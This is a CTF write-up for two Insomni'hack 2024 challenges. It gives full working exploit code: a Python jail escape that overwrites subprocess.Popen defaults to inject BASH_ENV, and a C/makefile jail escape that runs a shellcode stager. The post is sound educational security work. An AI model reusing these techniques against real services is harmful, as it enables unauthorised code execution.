27 KiB
insomni'hack teaser 2024
i, for one, am not afraid to seek answers to life's toughest questions
like "how well can a team of 2 people do in a 24 hour ctf when they start almost 12 hours late"
this is like, not bad actually???
anyway, let's talk about jails
PPP
(there was no flavor text for this one, it was just a flavor image of rhianna and i'm not gonna like go download it and then rehost it here so just imagine that's what's here)
we can see immediately that the flag is inaccessible to the challenge user, and the only way to get
it is to execute the command /readflag Please
(immediately because i just like, ran the binary and
found out that's what it does. i didn't bother reversing it at all)
here's the code for the challenge server
from os import popen
import hashlib, time, math, subprocess, json
def response(res):
print(res + ' | ' + popen('date').read())
exit()
def generate_nonce():
current_time = time.time()
rounded_time = round(current_time / 60) * 60 # Round to the nearest 1 minutes (60 seconds)
return hashlib.sha256(str(int(rounded_time)).encode()).hexdigest()
def is_valid_proof(data, nonce):
DIFFICULTY_LEVEL = 6
guess_hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
return guess_hash[:DIFFICULTY_LEVEL] == '0' * DIFFICULTY_LEVEL
class Blacklist:
def __init__(self, data, nonce):
self.data = data
self.nonce = nonce
def get_data(self):
out = {}
out['data'] = self.data if 'data' in self.__dict__ else ()
out['nonce'] = self.nonce if 'nonce' in self.__dict__ else ()
return out
def add_to_blacklist(src, dst):
for key, value in src.items():
if hasattr(dst, '__getitem__'):
if dst[key] and type(value) == dict:
add_to_blacklist(value, dst.get(key))
else:
dst[key] = value
elif hasattr(dst, key) and type(value) == dict:
add_to_blacklist(value, getattr(dst, key))
else:
setattr(dst, key, value)
def lists_to_set(data):
if type(data) == dict:
res = {}
for key, value in data.items():
res[key] = lists_to_set(value)
elif type(data) == list:
res = ()
for value in data:
res = (*res, lists_to_set(value))
else:
res = data
return res
def is_blacklisted(json_input):
bl_data = blacklist.get_data()
if json_input['data'] in bl_data['data']:
return True
if json_input['nonce'] in bl_data['nonce']:
return True
json_input = lists_to_set(json_input)
add_to_blacklist(json_input, blacklist)
return False
if __name__ == '__main__':
blacklist = Blacklist(['dd9ae2332089200c4d138f3ff5abfaac26b7d3a451edf49dc015b7a0a737c794'], ['2bfd99b0167eb0f400a1c6e54e0b81f374d6162b10148598810d5ff8ef21722d'])
try:
json_input = json.loads(input('Prove your work 😼\n'))
except Exception:
response('no')
if not isinstance(json_input, dict):
response('message')
data = json_input.get('data')
nonce = json_input.get('nonce')
client_hash = json_input.get('hash')
if not (data and nonce and client_hash):
response('Missing data, nonce, or hash')
server_nonce = generate_nonce()
if server_nonce != nonce:
response('nonce error')
if not is_valid_proof(data, nonce):
response('Proof of work is invalid')
server_hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
if server_hash != client_hash:
response('Hash does not match')
if is_blacklisted(json_input):
response('blacklisted PoW')
response('Congratulation, You\'ve proved your work 🎷🐴')
there's a proof-of-work segment (sigh), checking that your input doesn't belong to a set of disallowed inputs and then...seemingly nothing!
where's the primitive???
normally what i'll loosely call "pyjail" style challenges have some sort of core execution primitive
like doing an eval on user-supplied code, subject to some sandboxing, or maybe AST sanitization, or
perhaps being able to replace bytecode on function objects. this code is interesting because it
doesn't do any of that, yet we can assume that at some point we gain the ability to execute
/readflag Please
to read the flag
instead, after verifying the proof of work, it goes through the following functions
is_blacklisted
- transformed by
lists_to_set
- this function converts any lists nested at any level in the data structure to tuples
- there's literally no need for this for normal functioning of the server, so we could assume it's an important part of the solution. (this turns out to be correct)
- processed by
add_to_blacklist
- this merges the user input with the
Blacklist
object instance recursively, handling dicts and object attributes along the way
- this merges the user input with the
- transformed by
when something looks weird it's worth thinking about it because that can help greatly narrow the search space for a solution. in this case, we can assume that solutions would involve tuples somehow, because we're given this primitive that serves no other useful purpose than to produce tuples
so the primitive is assignment to values at any depth of objects reachable from the starting object instance, of any type supported by json
the targets of this primitive are any object that can be found by recursively traversing using
- dict lookups
- attribute lookups
and the values that can be changed or added are
None
- strings
- ints and floats
- booleans
- dicts of any of this
- tuples of any of this
an important thing we can't do is assign a value to a lookup for an existing other runtime value. in other words, this is a write-only primitive
fucking around in ipython
a good approach to pyjails is press the .
key and then hit tab a bunch of times in ipython.
seriously. so let's go do that for a second
Python 3.11.6 (main, Nov 14 2023, 09:36:21) [GCC 13.2.1 20230801]
Type 'copyright', 'credits' or 'license' for more information
IPython 8.18.1 -- An enhanced Interactive Python. Type '?' for help.
[ins] In [1]: import ppp
[ins] In [2]: obj = ppp.Blacklist(['x'], ['y'])
[ins] In [3]: obj.__
the object has its usual defined attributes, and then the set of python intrinsic double underscore attributes. the goal here is to get a reference to anything interesting, with a specific focus on stuff that is tuples
unfortunately the object itself is not that interesting. __class__
is a useful thing to get
references to other random stuff but we get stuck at the __subclasses__()
barrier because that's a
function and we can't call functions. most of this stuff is also read-only, so that doesn't help us
either
let's look at the function get_data
[ins] In [3]: obj.get_data.__
i was expecting there to be like __code__
in here but there wasn't. so i quickly learned that
this is a bound instance of the underlying function, which python has a dedicated object for, and
the underlying function can be accessed with __func__
[ins] In [3]: obj.get_data.__func__.__
so there's the __code__
attribute which can be used to replace the bytecode of the function, but
only if you call the replace
function, the attributes can't be written directly. there's some
other stuff in here but it's mostly function calls and not that interesting. __module__
would be
nice if it were a reference to the actual module and not just the name of it but oh well
one thing i found here that is really interesting is __defaults__
and __kwdefaults__
__defaults__
__defaults__
stores the default arguments for the function, if it was defined with default
arguments
[ins] In [1]: def my_func(a="default value"):
...: print(a)
...:
[ins] In [2]: my_func.__defaults__
Out[1]: ('default value',)
__kwdefaults__
similarly does defaults for non-positional keyword arguments
notice how __defaults__
takes a tuple. and it's settable
[ins] In [3]: my_func.__defaults__ = ("lol hacked",)
[ins] In [4]: my_func()
lol hacked
it's all coming together,,,
unfortunately get_data
doesn't take any arguments. so we'll have to find something else to do this
on
going deeper
backtracking, there is one more useful key in the function's attributes: __globals__
[ins] In [3]: obj.get_data.__func__.__globals__
{
[...snip...]
'popen': <function os.popen(cmd, mode='r', buffering=-1)>,
'hashlib': <module 'hashlib' from '/usr/lib/python3.11/hashlib.py'>,
'time': <module 'time' (built-in)>,
'math': <module 'math' from '/usr/lib/python3.11/lib-dynload/math.cpython-311-x86_64-linux-gnu.so'>,
'subprocess': <module 'subprocess' from '/usr/lib/python3.11/subprocess.py'>,
'json': <module 'json' from '/usr/lib/python3.11/json/__init__.py'>,
'response': <function ppp.response(res)>,
'generate_nonce': <function ppp.generate_nonce()>,
'is_valid_proof': <function ppp.is_valid_proof(data, nonce)>,
'Blacklist': ppp.Blacklist,
'add_to_blacklist': <function ppp.add_to_blacklist(src, dst)>,
'lists_to_set': <function ppp.lists_to_set(data)>,
'is_blacklisted': <function ppp.is_blacklisted(json_input)>}
neat
remember that the goal is the execute a command with an argument. taking a look at the actual ppp
module the only remotely similar thing is the call to popen
in the response
function. we also
see that subprocess
is imported but not used (huh i wonder why that is,). so we have popen
in
scope here let's try to bonk it
# VxWorks has no user space shell provided. As a result, running
# command in a shell can't be supported.
if sys.platform != 'vxworks':
# Supply os.popen()
def popen(cmd, mode="r", buffering=-1):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
if mode not in ("r", "w"):
raise ValueError("invalid mode %r" % mode)
if buffering == 0 or buffering is None:
raise ValueError("popen() does not support unbuffered streams")
import subprocess
if mode == "r":
proc = subprocess.Popen(cmd,
shell=True, text=True,
stdout=subprocess.PIPE,
bufsize=buffering)
return _wrap_close(proc.stdout, proc)
else:
proc = subprocess.Popen(cmd,
shell=True, text=True,
stdin=subprocess.PIPE,
bufsize=buffering)
return _wrap_close(proc.stdin, proc)
ok so let's just try to change the defaults
[ins] In [1]: from os import popen
[ins] In [2]: popen.__defaults__ = ("/readflag Please", "r", -1)
[ins] In [3]: popen
Out[3]: <function os.popen(cmd='/readflag Please', mode='r', buffering=-1)>
[ins] In [4]: popen("date").read()
Out[4]: 'Sun Jan 21 08:05:37 PM EST 2024\n'
so unfortunately when the cmd argument is provided, we can't override it using the defaults. this makes sense
os.popen
uses subprocess.Popen
internally. hey remember how subprocess
is imported but never
used so it's in the __globals__
?? wow that sure is convenient!
let's set defaults on subprocess.Popen
class Popen:
# ....
def __init__(self, args, bufsize=-1, executable=None,
stdin=None, stdout=None, stderr=None,
preexec_fn=None, close_fds=True,
shell=False, cwd=None, env=None, universal_newlines=None,
startupinfo=None, creationflags=0,
restore_signals=True, start_new_session=False,
pass_fds=(), *, user=None, group=None, extra_groups=None,
encoding=None, errors=None, text=None, umask=-1, pipesize=-1,
process_group=None):
"""Create new Popen instance."""
# ...
what we are provided is args
, shell
, text
, stdout
, and bufsize
, so we can't override
those. but we can assign a new default value to anything else
at this point we could try the basic approach of setting executable
to /readflag
, but since
there is no control of the argument to /readflag
this won't work. how else can we input a full
command with an argument?
to the bash man pages!
one possible way to control the behavior of the shell that is launched (we can choose bash
or the
default sh
[dash
] based on the executable
parameter) is via environment variables
so i opened up the man page for bash..........and then i immediately gave up and just asked
@rhelmot whether there was any cheese with bash environment variables you could do, and she offered
up BASH_ENV
BASH_ENV
If this parameter is set when bash is executing a shell script, its value is interpreted as a
filename containing commands to initialize the shell, as in ~/.bashrc. The value of BASH_ENV
is subjected to parameter expansion, command substitution, and arithmetic expansion before
being interpreted as a filename. PATH is not used to search for the resultant filename.
unfortunately, BASH_ENV
needs to be a filename instead of just a list of commands. so to solve
the issue of having a file @rhelmot suggested /proc/self/environ
. unfortunately this doesn't work
because the size of the file as reported by the kernel is 0, and bash actually uses that when
reading it,
BASH_ENV=/proc/self/environ AAAA="$(printf '\n\necho hacked\n')" strace /bin/bash -c "date"
....
openat(AT_FDCWD, "/proc/self/environ", O_RDONLY) = 3
newfstatat(3, "", {st_mode=S_IFREG|0400, st_size=0, ...}, AT_EMPTY_PATH) = 0
read(3, "", 0) = 0
close(3) = 0
....
u_u
however there is another thing we can do which is to just use stdin, because the original stdin is
still bound to the process that gets executed! so we can pass BASH_ENV
as /proc/self/fd/0
and
then provide the additional command to run as input. this also requires us to call shutdown
on the
socket to the remote in order to close the stream
putting it together
assembly of the final exploit:
popen_defaults = [-1, "/bin/bash", None, None, None, None, True, False,
None, {"BASH_ENV":"/proc/self/fd/0"}, None, None, 0, True, False, []]
this defines the defaults tuple that gets assigned to Popen.__init__.__defaults__
, kept same as
the original except for executable /bin/bash
and environment with BASH_ENV
for _ in tqdm.trange(50000000):
nonce = ppp.generate_nonce()
data = secrets.token_hex(16)
if ppp.is_valid_proof(data, nonce):
break
else:
raise Exception("oops")
hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
this generates the proof of work. we just steal the original code's nonce generator and validation function
obj = {
"data": data,
"nonce": nonce,
"hash": hash,
"get_data": {
"__func__": {
"__globals__": {
"subprocess": {
"Popen": {
"__init__": {
"__defaults__": popen_defaults
}
}
}
}
}
}
}
payload = json.dumps(obj)
this assembles the payload with the proof of work along with the attribute we're setting
the attribute written out is
.get_data.__func__.__globals__["subprocess"].Popen.__init__.__defaults__
finally, we run the exploit
print("running")
r = remote("ppp.insomnihack.ch", 12345)
print(r.recvline())
r.sendline(payload)
r.sendline("/readflag Please")
and here we call shutdown
to close the stdin stream on the remote
r.shutdown('send')
r.interactive()
normally, we should be done here, however this didn't seem to work on the remote
that's right, get nagled
turns out the issue (probably?) was that somehow pwntools is not setting TCP_NODELAY
and thus the
stage 1 and stage 2 payloads were probably getting combined into the same packet or somehow not sent
at all. i had intuition for nagling being a thing that exists so i didn't debug this issue at all i
just added
r.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
this made the exploit work at the time, though when testing it further i realized it's still kind of unstable, and i'm not actually sure how it managed to work the first time during the CTF. oh well. it works locally so i'm not super concerned
terminal pursuit
it's a makefile/c jail
During COVID a friend of mine decided to learn coding by implementing a game he loves: Trivial Pursuit. He started with C but, finding it too difficult, he switched to python midway through.
Terminal Pursuit is the result of his work. I take no responsibility at all, all what I have done was dockerize the thing, it may be broken, I'll let you figure that out...
nc terminal-pursuit.insomnihack.ch 1337
there's a bunch of jail stuff that ends up being kind of unimportant, but after taking a look we can see the structure of the server
main.py
: contains the main interaction modequizzes/Makefile
: builds the quiz binaries (in C)quizzes/*.c
: the quiz binariesquizzes/pts.txt
: the score file appended to by the quiz binaries
main.py
i've cut it down to just the most important parts
alphabet = "abcdefghijklmnopqrstuvwxyz/,:;[]_-."
# ....
def get_user_string(text):
print(text)
s = input("> ").lower()
for c in s:
if c not in alphabet:
exit(0)
return s[:7]
this defines the allowed user input. all inputs must be 7 characters or less, and come from the very restricted alphabet
def run_quizz(username, category):
command = f"make run quizz=\"{prefix + category}\" username=\"{username}\""
os.system(command)
def play():
username = get_user_string(gui.username)
category = get_user_string(gui.category)
run_quizz(username, category)
each quiz is run by prompting the user for their username, and the name of the quiz, and then
calling make
with the parameters. the makefile then builds and runs the specified quiz binary
CC = gcc
CFLAGS = -x c -w
ifeq ($(findstring .,$(quizz)),)
override quizz:=$(quizz).c
endif
run: build
@./run "$(username)"
build:
@$(CC) $(CFLAGS) "$(quizz)" -o run
the makefile also appends a .c
to the quiz name if it doesn't already have a .
in it.
additionally it uses the -x c
parameter to force the source language to be C. it's interesting
that it does this because the provided quizzes, books.c
, ctf.c
, and miscgod.c
are all
obviously C files, and the flag shouldn't be needed for those. let's make a note of this
here's an example of a quiz, in books.c
(note only books.c
and miscgod.c
are defined, ctf.c
doesn't contain any quiz code)
// ...
const int LEN = 6;
const char *QUESTIONS[] = {
// ...
};
const int SOLUTIONS[] = { 1, 1, 1, 1, 1, 1, };
/******************
* Main
******************/
int main(int argc, char* argv[]) {
setvbuf(stdout, NULL, _IONBF, 0);
FILE *file;
file = fopen(scores_file, "a");
fprintf(file,"%s = {", argv[1]);
int answer;
int score = 0;
for (int i = 0; i < LEN; i++) {
printf("%s\n", QUESTIONS[i]);
printf("Your answer: ");
scanf("%d", &answer);
if (answer == SOLUTIONS[i]) {
score++;
printf("Correct!\n\n");
} else {
printf("False!\n\n");
}
fprintf(file, "%d,", answer);
}
fprintf(file, "%d}\n", score);
fclose(file);
}
we can see that the quiz asks the user for a series of answer inputs, reads them with scanf("%d")
,
and produces a score file consisting of the provided username, a list of the answers, and the final
score. for example, if we play books
as username user
, the resulting pts.txt
file will look
like this
user = {1,2,3,4,5,6,1}
and that's it. that's all you get
revisiting -x c
since there's no obvious code execution primitives in the code, we can assume that some trickery is
needed to gain code execution. notice that pts.txt
is in the quizzes
directory. also, it's an
allowed input because it's 7 chars and only uses allowed characters. what happens if we try to run
the quiz pts.txt
?
$ make username=user quizz=pts.txt
pts.txt:1:1: error: expected ‘,’ or ‘;’ at end of input
1 | user = {1,2,3,4,5,6,1}
| ^~~~
make: *** [Makefile:12: build] Error 1
huh, neat
the cflag -x c
in the makefile ensures that gcc compiles pts.txt
as if it was C source. now
clearly as it stands it's not quite C, but maybe we can make this work
when is main not a function
one thing that stands out here is the ability to assign a variable as a compound integer initializer. this can be used to define functions that are normally, y'know, functions, as arrays of integers, and it still works when compiled because gcc puts the integer bytes into the binary, and the integer bytes are valid instructions. see main is usually a function. so then when is it not?
that post comes up with the following
const int main[] = {
-443987883, 440, 113408, -1922629632,
4149, 899584, 84869120, 15544,
266023168, 1818576901, 1461743468, 1684828783,
-1017312735
};
this actually compiles, and interestingly enough just main = { .... };
still compiles, but doesn't
run because main
gets put in .data
which is not normally executable. hence the const
in the
above example. that actually causes main to get put in .rodata
gcc -x c -w - <<EOF
const int main[] = {
-443987883, 440, 113408, -1922629632,
4149, 899584, 84869120, 15544,
266023168, 1818576901, 1461743468, 1684828783,
-1017312735
};
EOF
objdump -x a.out | grep main
0000000000000000 F *UND* 0000000000000000 __libc_start_main@GLIBC_2.34
0000000000002020 g O .rodata 0000000000000034 main
on x86-64 .rodata
gets put in a PT_LOAD
segment that is executable, alongside .text
, so we end
up with an executable main function this way
so basically the plan is to put integers representing shellcode for the main function in as the
answers to a quiz, then invoke the quiz pts.txt
in order to cause the result to be executed
sizecoding time
we have 2 functioning quizzes available, one with 6 questions, and one with 12. they're otherwise
identical. the 12-question quiz (miscgod
) gives the most room for shellcode (48 bytes)
what i did here was actually build a stager for a second stage of shellcode, even though this was
completely unnecessary because you can fit an execve
call in 48 bytes (in fact pwntools' shellcode
is exactly that). the stager uses 2 syscalls to mmap
a new rwx
page and then read
shellcode
into it and then jump to it
so using my amazing assembly sizecoding skills i,,,,, went to godbolt and turned on -Os
and wrote
the shellcode in C
#include <sys/syscall.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/mman.h>
#define rv(x) register uint64_t x asm(#x)
void test(){
rv(rax) = SYS_mmap;
rv(rdi) = 0;
rv(rsi) = 4096;
rv(rdx) = PROT_READ | PROT_WRITE | PROT_EXEC;
rv(r10) = MAP_SHARED | MAP_ANONYMOUS;
rv(r8) = -1;
rv(r9) = 0;
asm volatile("syscall":"+r"(rax):"r"(rdi),"r"(rsi),"r"(rdx),"r"(r10),
"r"(r8),"r"(r9):"memory");
void (*tmp)(void) = (void*)rax;
rdi = 0;
rsi = rax;
rax = 0;
rdx = 4096;
asm volatile("syscall":"+r"(rax):"r"(rdi),"r"(rsi),"r"(rdx):"memory");
tmp();
}
this produces
test:
mov eax, 9
xor edi, edi
mov esi, 4096
or r8, -1
mov edx, 7
mov r10d, 33
xor r9d, r9d
syscall
mov edx, 4096
mov rcx, rax
mov rsi, rax
xor eax, eax
syscall
jmp rcx
it's 49 bytes. damn
there's a trick to save some more bytes which is to push rax
after the mmap
and ret
at the
end. this gets us down to 46 bytes
mov eax, 9
xor edi, edi
mov esi, 4096
or r8, -1
mov edx, 7
mov r10d, 33
xor r9d, r9d
syscall
mov edx, 4096
mov rsi, rax
push rax
xor eax, eax
syscall
ret
and then the second stage is just the normal pwntools shellcode, which again, i didn't realize would have worked on its own. oh well
fixing the formatting
so there's still the slight problem that the pts.txt
file isn't quite valid C syntax as it stands.
we can fix that, because we're allowed the /
character, which means we can insert comments.
additionally, we can use ;//
at the end to add the necessary semicolon (and comment out the rest)
for this we can use the usernames const//
, int//
, main[]
, and ;//
, so the final points file
will look like this
const// = { ... }
int// = { ... }
main[] = { shellcode int values here }
;// = { ... }
this becomes a valid C file in the right format
putting it together
stage1 = """
mov eax, 9
xor edi, edi
mov esi, 4096
or r8, -1
mov edx, 7
mov r10d, 33
xor r9d, r9d
syscall
mov edx, 4096
mov rsi, rax
push rax
xor eax, eax
syscall
ret
"""
stage1_bin = asm(stage1)
assert len(stage1_bin) == 46
stage1_bin = stage1_bin + b"\x00\x00"
stage1_payload = list(struct.unpack("<iiiiiiiiiiii", stage1_bin))
stage2 = shellcraft.linux.sh()
stage2_bin = asm(stage2).ljust(4096, b"\x00")
this defines the stage 1 and stage 2 shellcodes to run in the exploit
games = [
{"quiz": "miscgod", "username": "const//", "answers": [0]*12},
{"quiz": "miscgod", "username": "int//", "answers": [0]*12},
{"quiz": "miscgod", "username": "main[]", "answers": stage1_payload},
{"quiz": "miscgod", "username": ";//", "answers": [0]*12},
{"quiz": "pts.txt", "username": "hacked", "rawinput": stage2_bin},
]
this is a compact representation of the quiz games we're going to play in order to format the points file the right way
def play_game(r, game):
r.sendlineafter(b"> ", b"1")
r.sendlineafter(b"> ", game["username"].encode())
r.sendlineafter(b"> ", game["quiz"].encode())
if "answers" in game:
for answer in game["answers"]:
r.sendlineafter(b"answer: ", str(answer).encode())
else:
r.send(game["rawinput"])
finally, we define the utility function to play a game from a given game specification, and then run the exploit
def run(host="localhost"):
r = remote(host, 1337)
for game in games:
play_game(r, game)
r.interactive()
this should pop a shell, and from there the flag can be read out
conclusion
ctfs can often have really bad misc categories. misc is known to be plagued with annoying gamey challenges and this can make a ctf pretty frustrating to play. but i can solidly say that the insomni'hack teaser wasn't one of these ctfs
both of these misc challenges were really interesting and presented novel exploitation paths that needed to work around very tight constraints. and solving them was a lot of fun
const int main[] = {15544, 268382464, 5};